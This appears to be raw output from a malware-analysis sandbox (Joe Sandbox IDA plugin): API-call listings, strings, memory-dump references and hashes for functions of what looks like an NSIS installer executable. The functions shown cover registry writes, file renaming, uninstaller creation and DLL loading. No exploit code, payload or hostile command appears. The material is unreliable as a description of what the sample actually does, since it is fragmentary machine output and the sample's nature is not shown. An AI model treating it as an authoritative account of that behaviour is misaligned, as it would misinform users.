                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                            • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                            • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                            • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
